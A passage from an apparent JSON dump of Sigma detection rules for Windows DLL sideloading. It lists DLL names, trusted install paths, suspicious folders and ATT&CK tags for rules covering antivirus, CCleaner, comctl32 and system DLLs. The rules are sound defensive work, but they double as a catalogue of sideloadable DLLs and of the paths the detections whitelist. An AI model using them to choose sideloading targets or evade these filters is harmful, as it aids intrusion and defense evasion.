    "content": "title: Abusable DLL Potential Sideloading From Suspicious Location\nid: 799a5f48-0ac1-4e0f-9152-71d137d48c2a\nstatus: test\ndescription: Detects potential DLL sideloading of DLLs that are known to be abused from suspicious locations\nreferences:\n    - https://www.trendmicro.com/en_us/research/23/f/behind-the-scenes-unveiling-the-hidden-workings-of-earth-preta.html\n    - https://research.checkpoint.com/2023/beyond-the-horizon-traveling-the-world-on-camaro-dragons-usb-flash-drives/\nauthor: X__Junior (Nextron Systems)\ndate: 2023-07-11\ntags:\n    - attack.execution\n    - attack.t1059\nlogsource:\n    category: image_load\n    product: windows\ndetection:\n    selection_dll:\n        ImageLoaded|endswith:\n            # Note: Add more generic DLLs that cannot be pin-pointed to a single application\n            - '\\coreclr.dll'\n            - '\\facesdk.dll'\n            - '\\HPCustPartUI.dll'\n            - '\\libcef.dll'\n            - '\\ZIPDLL.dll'\n    selection_folders_1:\n        ImageLoaded|contains:\n            - ':\\Perflogs\\'\n            - ':\\Users\\Public\\'\n            - '\\Temporary Internet'\n            - '\\Windows\\Temp\\'\n    selection_folders_2:\n        - ImageLoaded|contains|all:\n              - ':\\Users\\'\n              - '\\Favorites\\'\n        - ImageLoaded|contains|all:\n              - ':\\Users\\'\n              - '\\Favourites\\'\n        - ImageLoaded|contains|all:\n              - ':\\Users\\'\n              - '\\Contacts\\'\n        - ImageLoaded|contains|all:\n              - ':\\Users\\'\n              - '\\Pictures\\'\n    condition: selection_dll and 1 of selection_folders_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/image_load/image_load_side_load_antivirus.yml",
    "content": "title: Potential Antivirus Software DLL Sideloading\nid: 552b6b65-df37-4d3e-a258-f2fc4771ae54\nstatus: test\ndescription: Detects potential DLL sideloading of DLLs that are part of antivirus software suchas McAfee, Symantec...etc\nreferences:\n    - https://hijacklibs.net/ # For list of DLLs that could be sideloaded (search for dlls mentioned here in there)\nauthor: Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)\ndate: 2022-08-17\nmodified: 2025-10-07\ntags:\n    - attack.defense-evasion\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.t1574.001\nlogsource:\n    category: image_load\n    product: windows\ndetection:\n    # Bitdefender\n    selection_bitdefender:\n        ImageLoaded|endswith: '\\log.dll'\n    filter_log_dll_bitdefender:\n        ImageLoaded|startswith:\n            - 'C:\\Program Files\\Bitdefender Antivirus Free\\'\n            - 'C:\\Program Files (x86)\\Bitdefender Antivirus Free\\'\n    filter_log_dll_dell_sar:\n        Image: 'C:\\Program Files\\Dell\\SARemediation\\audit\\TelemetryUtility.exe'\n        ImageLoaded:\n            - 'C:\\Program Files\\Dell\\SARemediation\\plugin\\log.dll'\n            - 'C:\\Program Files\\Dell\\SARemediation\\audit\\log.dll'\n    filter_log_dll_canon:\n        ImageLoaded|startswith: 'C:\\Program Files\\Canon\\MyPrinter\\'\n    filter_log_dll_avast:\n        ImageLoaded:\n            - 'C:\\Program Files\\AVAST Software\\Avast\\log.dll'\n            - 'C:\\Program Files (x86)\\AVAST Software\\Avast\\log.dll'\n    filter_log_dll_avg:\n        ImageLoaded:\n            - 'C:\\Program Files\\AVG\\Antivirus\\log.dll'\n            - 'C:\\Program Files (x86)\\AVG\\Antivirus\\log.dll'\n    # F-Secure\n    selection_fsecure:\n        ImageLoaded|endswith: '\\qrt.dll'\n    filter_fsecure:\n        ImageLoaded|startswith:\n            - 'C:\\Program Files\\F-Secure\\Anti-Virus\\'\n            - 'C:\\Program Files (x86)\\F-Secure\\Anti-Virus\\'\n 
   # McAfee\n    selection_mcafee:\n        ImageLoaded|endswith:\n            - '\\ashldres.dll'\n            - '\\lockdown.dll'\n            - '\\vsodscpl.dll'\n    filter_mcafee:\n        ImageLoaded|startswith:\n            - 'C:\\Program Files\\McAfee\\'\n            - 'C:\\Program Files (x86)\\McAfee\\'\n    # CyberArk\n    selection_cyberark:\n        ImageLoaded|endswith: '\\vftrace.dll'\n    filter_cyberark:\n        ImageLoaded|startswith:\n            - 'C:\\Program Files\\CyberArk\\Endpoint Privilege Manager\\Agent\\x32\\'\n            - 'C:\\Program Files (x86)\\CyberArk\\Endpoint Privilege Manager\\Agent\\x32\\'\n    # Avast\n    selection_avast:\n        ImageLoaded|endswith: '\\wsc.dll'\n    filter_wsc_dll_avast:\n        ImageLoaded|startswith:\n            - 'C:\\program Files\\AVAST Software\\Avast\\'\n            - 'C:\\program Files (x86)\\AVAST Software\\Avast\\'\n    filter_wsc_dll_avg:\n        ImageLoaded|startswith:\n            - 'C:\\Program Files\\AVG\\Antivirus\\'\n            - 'C:\\Program Files (x86)\\AVG\\Antivirus\\'\n    # ESET\n    selection_eset_deslock:\n        ImageLoaded|endswith: '\\DLPPREM32.dll'\n    filter_eset_deslock:\n        ImageLoaded|startswith:\n            - 'C:\\program Files\\ESET'\n            - 'C:\\program Files (x86)\\ESET'\n    # Trend Micro Titanium\n    selection_titanium:\n        ImageLoaded|endswith: '\\tmdbglog.dll'\n    filter_titanium:\n        ImageLoaded|startswith:\n            - 'C:\\program Files\\Trend Micro\\Titanium\\'\n            - 'C:\\program Files (x86)\\Trend Micro\\Titanium\\'\n    condition: (selection_bitdefender and not 1 of filter_log_dll_*)\n               or (selection_fsecure and not filter_fsecure)\n               or (selection_mcafee and not filter_mcafee)\n               or (selection_cyberark and not filter_cyberark)\n               or (selection_avast and not 1 of filter_wsc_dll_*)\n               or (selection_titanium and not filter_titanium)\n               or 
(selection_eset_deslock and not filter_eset_deslock)\nfalsepositives:\n    - Applications that load the same dlls mentioned in the detection section. Investigate them and filter them out if a lot FPs are caused.\n    - Dell SARemediation plugin folder (C:\\Program Files\\Dell\\SARemediation\\plugin\\log.dll) is known to contain the 'log.dll' file.\n    - The Canon MyPrinter folder 'C:\\Program Files\\Canon\\MyPrinter\\' is known to contain the 'log.dll' file\nlevel: medium\n"
  },
  {
    "path": "rules/windows/image_load/image_load_side_load_appverifui.yml",
    "content": "title: Potential appverifUI.DLL Sideloading\nid: ee6cea48-c5b6-4304-a332-10fc6446f484\nstatus: test\ndescription: Detects potential DLL sideloading of \"appverifUI.dll\"\nreferences:\n    - https://web.archive.org/web/20220519091349/https://fatrodzianko.com/2020/02/15/dll-side-loading-appverif-exe/\nauthor: X__Junior (Nextron Systems)\ndate: 2023-06-20\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1574.001\nlogsource:\n    category: image_load\n    product: windows\ndetection:\n    selection:\n        ImageLoaded|endswith: '\\appverifUI.dll'\n    filter_main_legit_path:\n        Image:\n            - 'C:\\Windows\\SysWOW64\\appverif.exe'\n            - 'C:\\Windows\\System32\\appverif.exe'\n        ImageLoaded|startswith:\n            - 'C:\\Windows\\System32\\'\n            - 'C:\\Windows\\SysWOW64\\'\n            - 'C:\\Windows\\WinSxS\\'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/image_load/image_load_side_load_aruba_networks_virtual_intranet_access.yml",
    "content": "title: Aruba Network Service Potential DLL Sideloading\nid: 90ae0469-0cee-4509-b67f-e5efcef040f7\nstatus: test\ndescription: Detects potential DLL sideloading activity via the Aruba Networks Virtual Intranet Access \"arubanetsvc.exe\" process using DLL Search Order Hijacking\nreferences:\n    - https://twitter.com/wdormann/status/1616581559892545537?t=XLCBO9BziGzD7Bmbt8oMEQ&s=09\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-01-22\nmodified: 2023-03-15\ntags:\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1574.001\nlogsource:\n    category: image_load\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\arubanetsvc.exe'\n        ImageLoaded|endswith:\n            - '\\wtsapi32.dll'\n            - '\\msvcr100.dll'\n            - '\\msvcp100.dll'\n            - '\\dbghelp.dll'\n            - '\\dbgcore.dll'\n            - '\\wininet.dll'\n            - '\\iphlpapi.dll'\n            - '\\version.dll'\n            - '\\cryptsp.dll'\n            - '\\cryptbase.dll'\n            - '\\wldp.dll'\n            - '\\profapi.dll'\n            - '\\sspicli.dll'\n            - '\\winsta.dll'\n            - '\\dpapi.dll'\n    filter:\n        ImageLoaded|startswith:\n            - 'C:\\Windows\\System32\\'\n            - 'C:\\Windows\\SysWOW64\\'\n            - 'C:\\Windows\\WinSxS\\'\n    condition: selection and not filter\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/image_load/image_load_side_load_avkkid.yml",
    "content": "title: Potential AVKkid.DLL Sideloading\nid: 952ed57c-8f99-453d-aee0-53a49c22f95d\nstatus: test\ndescription: Detects potential DLL sideloading of \"AVKkid.dll\"\nreferences:\n    - https://research.checkpoint.com/2023/beyond-the-horizon-traveling-the-world-on-camaro-dragons-usb-flash-drives/\nauthor: X__Junior (Nextron Systems)\ndate: 2023-08-03\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1574.001\nlogsource:\n    category: image_load\n    product: windows\ndetection:\n    selection:\n        ImageLoaded|endswith: '\\AVKkid.dll'\n    filter_main_legit_path:\n        Image|contains:\n            - 'C:\\Program Files (x86)\\G DATA\\'\n            - 'C:\\Program Files\\G DATA\\'\n        Image|endswith: '\\AVKKid.exe'\n        ImageLoaded|startswith:\n            - 'C:\\Program Files (x86)\\G DATA\\'\n            - 'C:\\Program Files\\G DATA\\'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/image_load/image_load_side_load_ccleaner_du.yml",
    "content": "title: Potential CCleanerDU.DLL Sideloading\nid: 1fbc0671-5596-4e17-8682-f020a0b995dc\nstatus: test\ndescription: Detects potential DLL sideloading of \"CCleanerDU.dll\"\nreferences:\n    - https://lab52.io/blog/2344-2/\nauthor: X__Junior (Nextron Systems)\ndate: 2023-07-13\ntags:\n    - attack.defense-evasion\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.t1574.001\nlogsource:\n    category: image_load\n    product: windows\ndetection:\n    selection:\n        ImageLoaded|endswith: '\\CCleanerDU.dll'\n    filter_main_path:\n        Image|startswith:\n            - 'C:\\Program Files\\CCleaner\\'\n            - 'C:\\Program Files (x86)\\CCleaner\\'\n        Image|endswith:\n            - '\\CCleaner.exe'\n            - '\\CCleaner64.exe'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - False positives could occur from other custom installation paths. Apply additional filters accordingly.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/image_load/image_load_side_load_ccleaner_reactivator.yml",
    "content": "title: Potential CCleanerReactivator.DLL Sideloading\nid: 3735d5ac-d770-4da0-99ff-156b180bc600\nstatus: test\ndescription: Detects potential DLL sideloading of \"CCleanerReactivator.dll\"\nreferences:\n    - https://lab52.io/blog/2344-2/\nauthor: X__Junior\ndate: 2023-07-13\ntags:\n    - attack.defense-evasion\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.t1574.001\nlogsource:\n    category: image_load\n    product: windows\ndetection:\n    selection:\n        ImageLoaded|endswith: '\\CCleanerReactivator.dll'\n    filter_main_path:\n        Image|startswith:\n            - 'C:\\Program Files\\CCleaner\\'\n            - 'C:\\Program Files (x86)\\CCleaner\\'\n        Image|endswith: '\\CCleanerReactivator.exe'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - False positives could occur from other custom installation paths. Apply additional filters accordingly.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/image_load/image_load_side_load_chrome_frame_helper.yml",
    "content": "title: Potential Chrome Frame Helper DLL Sideloading\nid: 72ca7c75-bf85-45cd-aca7-255d360e423c\nstatus: test\ndescription: Detects potential DLL sideloading of \"chrome_frame_helper.dll\"\nreferences:\n    - https://hijacklibs.net/entries/3rd_party/google/chrome_frame_helper.html\nauthor: Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)\ndate: 2022-08-17\nmodified: 2023-05-15\ntags:\n    - attack.defense-evasion\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.t1574.001\nlogsource:\n    category: image_load\n    product: windows\ndetection:\n    selection:\n        ImageLoaded|endswith: '\\chrome_frame_helper.dll'\n    filter_main_path:\n        ImageLoaded|startswith:\n            - 'C:\\Program Files\\Google\\Chrome\\Application\\'\n            - 'C:\\Program Files (x86)\\Google\\Chrome\\Application\\'\n    filter_optional_user_path:\n        ImageLoaded|contains: '\\AppData\\local\\Google\\Chrome\\Application\\'\n    condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/image_load/image_load_side_load_classicexplorer32.yml",
    "content": "title: Potential DLL Sideloading Via ClassicExplorer32.dll\nid: caa02837-f659-466f-bca6-48bde2826ab4\nstatus: test\ndescription: Detects potential DLL sideloading using ClassicExplorer32.dll from the Classic Shell software\nreferences:\n    - https://blogs.blackberry.com/en/2022/12/mustang-panda-uses-the-russian-ukrainian-war-to-attack-europe-and-asia-pacific-targets\n    - https://app.any.run/tasks/6d8cabb0-dcda-44b6-8050-28d6ce281687/\nauthor: frack113\ndate: 2022-12-13\ntags:\n    - attack.defense-evasion\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.t1574.001\nlogsource:\n    category: image_load\n    product: windows\ndetection:\n    selection_classicexplorer:\n        ImageLoaded|endswith: '\\ClassicExplorer32.dll'\n    filter_classicexplorer:\n        ImageLoaded|startswith: 'C:\\Program Files\\Classic Shell\\'\n    condition: selection_classicexplorer and not filter_classicexplorer\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/image_load/image_load_side_load_comctl32.yml",
    "content": "title: Potential DLL Sideloading Via comctl32.dll\nid: 6360757a-d460-456c-8b13-74cf0e60cceb\nstatus: test\ndescription: Detects potential DLL sideloading using comctl32.dll to obtain system privileges\nreferences:\n    - https://github.com/binderlabs/DirCreate2System\n    - https://github.com/sailay1996/awesome_windows_logical_bugs/blob/60cbb23a801f4c3195deac1cc46df27c225c3d07/dir_create2system.txt\nauthor: Nasreddine Bencherchali (Nextron Systems), Subhash Popuri (@pbssubhash)\ndate: 2022-12-16\nmodified: 2022-12-19\ntags:\n    - attack.defense-evasion\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.t1574.001\nlogsource:\n    category: image_load\n    product: windows\ndetection:\n    selection:\n        ImageLoaded|startswith:\n            - 'C:\\Windows\\System32\\logonUI.exe.local\\'\n            - 'C:\\Windows\\System32\\werFault.exe.local\\'\n            - 'C:\\Windows\\System32\\consent.exe.local\\'\n            - 'C:\\Windows\\System32\\narrator.exe.local\\'\n            - 'C:\\windows\\system32\\wermgr.exe.local\\'\n        ImageLoaded|endswith: '\\comctl32.dll'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/image_load/image_load_side_load_coregen.yml",
    "content": "title: Potential DLL Sideloading Using Coregen.exe\nid: 0fa66f66-e3f6-4a9c-93f8-4f2610b00171\nstatus: test\ndescription: Detect usage of the \"coregen.exe\" (Microsoft CoreCLR Native Image Generator) binary to sideload arbitrary DLLs.\nreferences:\n    - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Coregen/\nauthor: frack113\ndate: 2022-12-31\ntags:\n    - attack.privilege-escalation\n    - attack.defense-evasion\n    - attack.t1218\n    - attack.t1055\nlogsource:\n    category: image_load\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\coregen.exe'\n    filter_main_legit_paths:\n        ImageLoaded|startswith:\n            - 'C:\\Program Files (x86)\\Microsoft Silverlight\\'\n            - 'C:\\Program Files\\Microsoft Silverlight\\'\n            - 'C:\\Windows\\System32\\'\n            - 'C:\\Windows\\SysWOW64\\'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/image_load/image_load_side_load_cpl_from_non_system_location.yml",
    "content": "title: System Control Panel Item Loaded From Uncommon Location\nid: 2b140a5c-dc02-4bb8-b6b1-8bdb45714cde\nstatus: test\ndescription: |\n    Detects image load events of system control panel items (.cpl) from uncommon or non-system locations that may indicate DLL sideloading or other abuse techniques.\nreferences:\n    - https://www.hexacorn.com/blog/2024/01/06/1-little-known-secret-of-fondue-exe/\n    - https://www.hexacorn.com/blog/2024/01/01/1-little-known-secret-of-hdwwiz-exe/\n    - https://github.com/mhaskar/FsquirtCPLPoC\n    - https://securelist.com/sidewinder-apt/114089/\nauthor: Anish Bogati\ndate: 2024-01-09\nmodified: 2026-02-17\ntags:\n    - attack.defense-evasion\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.t1574.001\nlogsource:\n    product: windows\n    category: image_load\ndetection:\n    selection:\n        ImageLoaded|endswith:\n            - '\\appwiz.cpl' # Usually loaded by fondue.exe\n            - '\\bthprops.cpl' # Usually loaded by fsquirt.exe\n            - '\\hdwwiz.cpl' # Usually loaded by hdwwiz.exe\n    filter_main_legit_location:\n        ImageLoaded|startswith:\n            - 'C:\\Windows\\Prefetch\\'\n            - 'C:\\Windows\\System32\\'\n            - 'C:\\Windows\\SysWOW64\\'\n            - 'C:\\Windows\\WinSxS\\'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: high\nregression_tests_path: regression_data/rules/windows/image_load/image_load_side_load_cpl_from_non_system_location/info.yml\n"
  },
  {
    "path": "rules/windows/image_load/image_load_side_load_dbgcore.yml",
    "content": "title: Potential DLL Sideloading Of DBGCORE.DLL\nid: 9ca2bf31-0570-44d8-a543-534c47c33ed7\nstatus: test\ndescription: Detects DLL sideloading of \"dbgcore.dll\"\nreferences:\n    - https://hijacklibs.net/ # For list of DLLs that could be sideloaded (search for dlls mentioned here in there)\nauthor: Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)\ndate: 2022-10-25\nmodified: 2025-10-06\ntags:\n    - attack.defense-evasion\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.t1574.001\nlogsource:\n    category: image_load\n    product: windows\ndetection:\n    selection:\n        ImageLoaded|endswith: '\\dbgcore.dll'\n    filter_main_generic:\n        ImageLoaded|startswith:\n            - 'C:\\Program Files (x86)\\'\n            - 'C:\\Program Files\\'\n            - 'C:\\Windows\\SoftwareDistribution\\'\n            - 'C:\\Windows\\System32\\'\n            - 'C:\\Windows\\SystemTemp\\'\n            - 'C:\\Windows\\SysWOW64\\'\n            - 'C:\\Windows\\WinSxS\\'\n    filter_optional_steam:\n        ImageLoaded|endswith: '\\Steam\\bin\\cef\\cef.win7x64\\dbgcore.dll'\n    filter_optional_opera:\n        # C:\\\\Users\\\\User\\\\AppData\\\\Local\\\\Temp\\\\.opera\\\\Opera Installer Temp\\\\opera_package_202311051506321\\\\assistant\\\\dbgcore.dll\n        ImageLoaded|contains: 'opera\\Opera Installer Temp\\opera_package'\n        ImageLoaded|endswith: '\\assistant\\dbgcore.dll'\n    condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Legitimate applications loading their own versions of the DLL mentioned in this rule\nlevel: medium\n"
  },
  {
    "path": "rules/windows/image_load/image_load_side_load_dbghelp.yml",
    "content": "title: Potential DLL Sideloading Of DBGHELP.DLL\nid: 6414b5cd-b19d-447e-bb5e-9f03940b5784\nstatus: test\ndescription: Detects potential DLL sideloading of \"dbghelp.dll\"\nreferences:\n    - https://hijacklibs.net/ # For list of DLLs that could be sideloaded (search for dlls mentioned here in there)\nauthor: Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)\ndate: 2022-10-25\nmodified: 2025-10-07\ntags:\n    - attack.defense-evasion\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.t1574.001\nlogsource:\n    category: image_load\n    product: windows\ndetection:\n    selection:\n        ImageLoaded|endswith: '\\dbghelp.dll'\n    filter_main_generic:\n        ImageLoaded|startswith:\n            - 'C:\\Program Files (x86)\\'\n            - 'C:\\Program Files\\'\n            - 'C:\\Windows\\SoftwareDistribution\\'\n            - 'C:\\Windows\\System32\\'\n            - 'C:\\Windows\\SystemTemp\\'\n            - 'C:\\Windows\\SysWOW64\\'\n            - 'C:\\Windows\\WinSxS\\'\n    filter_optional_anaconda:\n        ImageLoaded|endswith:\n            - '\\Anaconda3\\Lib\\site-packages\\vtrace\\platforms\\windll\\amd64\\dbghelp.dll'\n            - '\\Anaconda3\\Lib\\site-packages\\vtrace\\platforms\\windll\\i386\\dbghelp.dll'\n    filter_optional_epicgames:\n        ImageLoaded|endswith:\n            - '\\Epic Games\\Launcher\\Engine\\Binaries\\ThirdParty\\DbgHelp\\dbghelp.dll'\n            - '\\Epic Games\\MagicLegends\\x86\\dbghelp.dll'\n    filter_optional_opera:\n        ImageLoaded|contains: 'opera\\Opera Installer Temp\\opera_package'\n        ImageLoaded|endswith: '\\assistant\\dbghelp.dll'\n    condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Legitimate applications loading their own versions of the DLL mentioned in this rule\nlevel: medium\n"
  },
  {
    "path": "rules/windows/image_load/image_load_side_load_dbgmodel.yml",
    "content": "title: Potential DLL Sideloading Of DbgModel.DLL\nid: fef394cd-f44d-4040-9b18-95d92fe278c0\nstatus: test\ndescription: Detects potential DLL sideloading of \"DbgModel.dll\"\nreferences:\n    - https://hijacklibs.net/entries/microsoft/built-in/dbgmodel.html\nauthor: Gary Lobermier\ndate: 2024-07-11\nmodified: 2024-07-22\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.t1574.001\nlogsource:\n    product: windows\n    category: image_load\ndetection:\n    selection:\n        ImageLoaded|endswith: '\\dbgmodel.dll'\n    filter_main_generic:\n        ImageLoaded|startswith:\n            - 'C:\\Windows\\System32\\'\n            - 'C:\\Windows\\SysWOW64\\'\n            - 'C:\\Windows\\WinSxS\\'\n    filter_optional_windbg:\n        ImageLoaded|startswith: 'C:\\Program Files\\WindowsApps\\Microsoft.WinDbg_'\n    filter_optional_windows_kits:\n        ImageLoaded|startswith:\n            - 'C:\\Program Files (x86)\\Windows Kits\\'\n            - 'C:\\Program Files\\Windows Kits\\'\n    condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Legitimate applications loading their own versions of the DLL mentioned in this rule\nlevel: medium\n"
  },
  {
    "path": "rules/windows/image_load/image_load_side_load_eacore.yml",
    "content": "title: Potential EACore.DLL Sideloading\nid: edd3ddc3-386f-4ba5-9ada-4376b2cfa7b5\nstatus: test\ndescription: Detects potential DLL sideloading of \"EACore.dll\"\nreferences:\n    - https://research.checkpoint.com/2023/beyond-the-horizon-traveling-the-world-on-camaro-dragons-usb-flash-drives/\nauthor: X__Junior (Nextron Systems)\ndate: 2023-08-03\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1574.001\nlogsource:\n    category: image_load\n    product: windows\ndetection:\n    selection:\n        ImageLoaded|endswith: '\\EACore.dll'\n    filter_main_legit_path:\n        Image|contains|all:\n            - 'C:\\Program Files\\Electronic Arts\\EA Desktop\\'\n            - '\\EACoreServer.exe'\n        ImageLoaded|startswith: 'C:\\Program Files\\Electronic Arts\\EA Desktop\\'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/image_load/image_load_side_load_edputil.yml",
    "content": "title: Potential Edputil.DLL Sideloading\nid: e4903324-1a10-4ed3-981b-f6fe3be3a2c2\nstatus: test\ndescription: Detects potential DLL sideloading of \"edputil.dll\"\nreferences:\n    - https://alternativeto.net/news/2023/5/cybercriminals-use-wordpad-vulnerability-to-spread-qbot-malware/\nauthor: X__Junior (Nextron Systems)\ndate: 2023-06-09\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1574.001\nlogsource:\n    category: image_load\n    product: windows\ndetection:\n    selection:\n        ImageLoaded|endswith: '\\edputil.dll'\n    filter_main_generic:\n        ImageLoaded|startswith:\n            - 'C:\\Windows\\System32\\'\n            - 'C:\\Windows\\SysWOW64\\'\n            - 'C\\Windows\\WinSxS\\'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/image_load/image_load_side_load_from_non_system_location.yml",
    "content": "title: Potential System DLL Sideloading From Non System Locations\nid: 4fc0deee-0057-4998-ab31-d24e46e0aba4\nstatus: test\ndescription: Detects DLL sideloading of DLLs usually located in system locations (System32, SysWOW64, etc.).\nreferences:\n    - https://hijacklibs.net/ # For a list of DLLs that could be sideloaded (search there for the DLLs mentioned here). Wietze Beukema (project and research)\n    - https://blog.cyble.com/2022/07/21/qakbot-resurfaces-with-new-playbook/ # WindowsCodecs.dll\n    - https://blog.cyble.com/2022/07/27/targeted-attacks-being-carried-out-via-dll-sideloading/ # iphlpapi.dll\n    - https://github.com/XForceIR/SideLoadHunter/blob/cc7ef2e5d8908279b0c4cee4e8b6f85f7b8eed52/SideLoads/README.md # XForceIR (SideLoadHunter Project), Chris Spehn (research WFH Dridex)\n    - https://www.hexacorn.com/blog/2023/12/26/1-little-known-secret-of-runonce-exe-32-bit/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-08-14\nmodified: 2025-12-03\ntags:\n    - attack.defense-evasion\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.t1574.001\nlogsource:\n    category: image_load\n    product: windows\ndetection:\n    selection:\n        ImageLoaded|endswith:\n            - '\\aclui.dll'\n            - '\\activeds.dll'\n            - '\\adsldpc.dll'\n            - '\\aepic.dll'\n            - '\\apphelp.dll'\n            - '\\applicationframe.dll'\n            - '\\appvpolicy.dll'\n            - '\\appxalluserstore.dll'\n            - '\\appxdeploymentclient.dll'\n            - '\\archiveint.dll'\n            - '\\atl.dll'\n            - '\\audioses.dll'\n            - '\\auditpolcore.dll'\n            - '\\authfwcfg.dll'\n            - '\\authz.dll'\n            - '\\avrt.dll'\n            - '\\batmeter.dll'\n            - '\\bcd.dll'\n            - '\\bcp47langs.dll'\n            - '\\bcp47mrm.dll'\n            - '\\bcrypt.dll'\n            - '\\bderepair.dll'\n            - '\\bootmenuux.dll'\n            - '\\bootux.dll'\n            - '\\cabinet.dll'\n            - '\\cabview.dll'\n            - '\\certcli.dll'\n            - '\\certenroll.dll'\n            - '\\cfgmgr32.dll'\n            - '\\cldapi.dll'\n            - '\\clipc.dll'\n            - '\\clusapi.dll'\n            - '\\cmpbk32.dll'\n            - '\\cmutil.dll'\n            - '\\coloradapterclient.dll'\n            - '\\colorui.dll'\n            - '\\comdlg32.dll'\n            - '\\configmanager2.dll'\n            - '\\connect.dll'\n            - '\\coredplus.dll'\n            - '\\coremessaging.dll'\n            - '\\coreuicomponents.dll'\n            - '\\credui.dll'\n            - '\\cryptbase.dll'\n            - '\\cryptdll.dll'\n            - '\\cryptsp.dll'\n            - '\\cryptui.dll'\n            - '\\cryptxml.dll'\n            - '\\cscapi.dll'\n            - '\\cscobj.dll'\n            - '\\cscui.dll'\n            - '\\d2d1.dll'\n            - '\\d3d10_1.dll'\n            - '\\d3d10_1core.dll'\n            - '\\d3d10.dll'\n            - '\\d3d10core.dll'\n            - '\\d3d10warp.dll'\n            - '\\d3d11.dll'\n            - '\\d3d12.dll'\n            - '\\d3d9.dll'\n            - '\\d3dx9_43.dll'\n            - '\\dataexchange.dll'\n            - '\\davclnt.dll'\n            - '\\dcntel.dll'\n            - '\\dcomp.dll'\n            - '\\defragproxy.dll'\n            - '\\desktopshellext.dll'\n            - '\\deviceassociation.dll'\n            - '\\devicecredential.dll'\n            - '\\devicepairing.dll'\n            - '\\devobj.dll'\n            - '\\devrtl.dll'\n            - '\\dhcpcmonitor.dll'\n            - '\\dhcpcsvc.dll'\n            - '\\dhcpcsvc6.dll'\n            - '\\directmanipulation.dll'\n            - '\\dismapi.dll'\n            - '\\dismcore.dll'\n            - '\\dmcfgutils.dll'\n            - '\\dmcmnutils.dll'\n            - '\\dmcommandlineutils.dll'\n            - '\\dmenrollengine.dll'\n            - '\\dmenterprisediagnostics.dll'\n            - '\\dmiso8601utils.dll'\n            - '\\dmoleaututils.dll'\n            - '\\dmprocessxmlfiltered.dll'\n            - '\\dmpushproxy.dll'\n            - '\\dmxmlhelputils.dll'\n            - '\\dnsapi.dll'\n            - '\\dot3api.dll'\n            - '\\dot3cfg.dll'\n            - '\\dpx.dll'\n            - '\\drprov.dll'\n            - '\\drvstore.dll'\n            - '\\dsclient.dll'\n            - '\\dsparse.dll'\n            - '\\dsprop.dll'\n            - '\\dsreg.dll'\n            - '\\dsrole.dll'\n            - '\\dui70.dll'\n            - '\\duser.dll'\n            - '\\dusmapi.dll'\n            - '\\dwmapi.dll'\n            - '\\dwmcore.dll'\n            - '\\dwrite.dll'\n            - '\\dxcore.dll'\n            - '\\dxgi.dll'\n            - '\\dxva2.dll'\n            - '\\dynamoapi.dll'\n            - '\\eappcfg.dll'\n            - '\\eappprxy.dll'\n            - '\\edgeiso.dll'\n            - '\\edputil.dll'\n            - '\\efsadu.dll'\n            - '\\efsutil.dll'\n            - '\\esent.dll'\n            - '\\execmodelproxy.dll'\n            - '\\explorerframe.dll'\n            - '\\fastprox.dll'\n            - '\\faultrep.dll'\n            - '\\fddevquery.dll'\n            - '\\feclient.dll'\n            - '\\fhcfg.dll'\n            - '\\fhsvcctl.dll'\n            - '\\firewallapi.dll'\n            - '\\flightsettings.dll'\n            - '\\fltlib.dll'\n            - '\\framedynos.dll'\n            - '\\fveapi.dll'\n            - '\\fveskybackup.dll'\n        